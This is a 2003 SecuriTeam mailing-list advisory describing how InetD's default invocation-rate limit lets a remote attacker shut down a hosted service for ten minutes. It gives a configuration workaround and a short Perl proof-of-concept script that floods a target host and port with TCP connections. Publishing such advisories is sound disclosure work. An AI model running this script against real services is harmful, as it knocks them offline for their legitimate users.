[UNIX] Default Configuration of InetD Allows Attackers to Initiate a DoS

From: SecuriTeam (support_at_securiteam.com)
Date: 09/07/03

  • Next message: SecuriTeam: "[TOOL] InlineEgg, Egg/Shellcode Creation Library" 
    To: list@securiteam.com
Date: 7 Sep 2003 10:55:06 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Default Configuration of InetD Allows Attackers to Initiate a DoS
    ------------------------------------------------------------------------

    SUMMARY

    Due to the default configuration of InetD (Internet Services Daemon) it is
    possible for a remote attacker to initiate a denial of service attack
    against one of its hosted services. The attack is very easy to initiate,
    and requires only a limited amount of bandwidth (The issue was first
    reported in:
    <http://www.webhistory.org/www.lists/www-talk.1993q4/0312.html>
    http://www.webhistory.org/www.lists/www-talk.1993q4/0312.html, about 11
    years ago).

    DETAILS

    InetD has an option
         -R rate

      Specify the maximum number of times a service can be invoked in
      one minute; the default is 256. A rate of 0 allows an unlimited
      number of invocations.

    The problem is, remote attacker can establish as much connections per
    minute as bandwidth allows. How InetD reacts if more than 256 connections
    received in one minute? It will disable service for next 10 minutes to
    help attack to succeed. Of course, this is documented. Note that the
    interval is not configurable.

    In the log file something like will appear:
    Jul 23 15:27:10 host inetd[86]: ftp/tcp server failing (looping), service
    terminated

    If connection is closed by attacker before service actually starts, the IP
    address of attacker will never be logged.

    Workaround:
    Add to your inetd.conf file the following line:
    -R 0 -s your_ad_can_be_here

    Exploit:
    #!/usr/bin/perl

    use Socket;
    $host=@ARGV[0];
    $port=@ARGV[1];
    if ($host eq "" || $port eq "") {print "\n Usage progname HOST PORT \n";}
    $iadr=inet_aton($host); $padr=sockaddr_in($port,$iadr); for($i=0; $i <
    300; $i++) { socket(SOCK,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
     connect(SOCK,$padr) or next;
     close(SOCK);
    }
    print "\nDone\n";

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:3APA3A@SECURITY.NNOV.RU>
    3APA3A.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[TOOL] InlineEgg, Egg/Shellcode Creation Library"

    Relevant Pages